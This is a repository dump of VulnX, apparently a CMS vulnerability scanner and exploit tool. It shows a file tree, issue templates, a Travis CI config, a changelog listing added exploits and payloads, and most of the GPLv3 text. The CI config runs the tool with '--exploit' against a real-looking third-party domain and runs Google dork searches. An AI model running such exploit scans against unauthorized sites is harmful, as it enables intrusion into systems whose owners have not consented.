├── .github └── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md ├── .gitignore ├── .travis.yml ├── CHANGELOG.md ├── CONTRIBUTING.md ├── LICENSE ├── README.md ├── cli.py ├── common ├── __init__.py ├── banner.py ├── colors.py ├── output_wr.py ├── requestUp.py ├── threading.py └── uriParser.py ├── config ├── vulnx.desktop └── vulnxicon.png ├── docker ├── Dockerfile ├── README └── debian_stretch │ └── Dockerfile ├── install.sh ├── modules ├── __init__.py ├── dnsLookup.py ├── dorksEngine.py ├── druExploits.py ├── jooExploits.py ├── jooGrabber.py ├── portChecker.py ├── prestaExploits.py ├── wpExploits.py └── wpGrabber.py ├── requirements.txt ├── shell ├── VulnX.gif ├── VulnX.html ├── VulnX.php ├── VulnX.php.mp4 ├── VulnX.php.png ├── VulnX.txt └── VulnX.zip ├── update.sh └── vulnx.py /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Desktop (please complete the following information):** 27 | - OS: [e.g. iOS] 28 | - Browser [e.g. chrome, safari] 29 | - Version [e.g. 22] 30 | 31 | **Smartphone (please complete the following information):** 32 | - Device: [e.g. iPhone6] 33 | - OS: [e.g. iOS8.1] 34 | - Browser [e.g. stock browser, safari] 35 | - Version [e.g. 22] 36 | 37 | **Additional context** 38 | Add any other context about the problem here. 39 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | os: 3 | # os building 4 | - linux 5 | python: 6 | # version of python. 7 | - 3.6 8 | install: 9 | # install packages. 10 | - pip install -r ./requirements.txt 11 | before_script: 12 | - pip install flake8 13 | # stop the build if there are Python syntax errors or undefined names 14 | - flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics 15 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide 16 | - flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics 17 | script: 18 | # run this command to grabber all informations, and apply the vunerabilites search 19 | - python vulnx.py -u isetso.rnu.tn --cms all -t3 --web-info --exploit 20 | # show list dorks & search example for blaze dork 5 page of google search & output the results to logs/Dorks/getTime() 21 | - python vulnx.py -l all -D blaze -n 5 --output logs/ 22 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | #### v1.9 2 | - Add Vulnx−Mode `interactive mode` 3 | - Add Command Line Interface Class `cli` 4 | - Add Dork Functionnality to Vulnx−Mode 5 | - Fix DNSDUMP Functionnality 6 | 7 | #### v1.8 8 | - Remove pip & rename conf to config to excute update without problem. 9 | - Fix port arg to give port to scan. 10 | - CI : Change pip package. 11 | - Docker : change pip package. 12 | - Remove the ENV Variable. 13 | 14 | #### v1.7 15 | - add documentation vulnx for windows. 16 | - add minor changes in dockerfile. 17 | - add documentation for developper used vulnx library 18 | - fix regEx in prestashop version. 19 | - error handling and ignore warnings. 20 | 21 | #### v1.6 22 | - Added Payloads. 23 | - Added PS Exploits 24 | - Added Joomla Exploits 25 | - Fix Issues 26 | - Added Dorks Output {logs} 27 | - Scan Multiple targets. 28 | - Docker Using User. {`Fix Permissions`} 29 | - Fix .travis {`CI`: Run tests after merge or pull requests} 30 | - Listing Dorks {list `ps` , `joo` , `wp` , `dru`} exploits manually 31 | 32 | #### v1.5 33 | - Added 8 Prestashop Exploits. 34 | - Added `Windows` & `MacOS` Comptability 35 | - Fixed a few bugs 36 | - Added vulnx to Docker from Ubuntu Image. 37 | 38 | #### v1.4 39 | - Fix parsing url 40 | - Fix Robot Detected when you searching for dorks. 41 | - Deserialize `json` data from dnsdumpster 42 | - Added `Bot` Automate Scan 43 | - Fix Modules Name 44 | - Exports `Dorks` Search into file 45 | 46 | #### v1.3 47 | - Added vulnx to `PyPi` 48 | - Added a `ports` scanner **plugin**. 49 | - Improve `dorks` google searching. 50 | - Added `termux` compatibility & fix pip package. 51 | 52 | #### v1.2 53 | - Use of `ThreadPoolExecutor` for more speed 54 | - Added pip packages. 55 | - Added `travis.yml` continuous integration 56 | - Added shields to README.MD 57 | 58 | #### v1.1 59 | - Added `--timeout` , `--exploits` , `--cms-info` , `--domains-info` , options 60 | - Added `Dorks` list 61 | - Fixed `Dork Search` 62 | - Added `wordpress`, `joomla` ,`prestashop`, `drupal` , `lokomedia` , `magento` , `opencart` CMS DETECT. 63 | - Disabled `SSL` Warning 64 | - Added `WP-Exploits` 65 | - Fixed `Dockerfile` 66 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 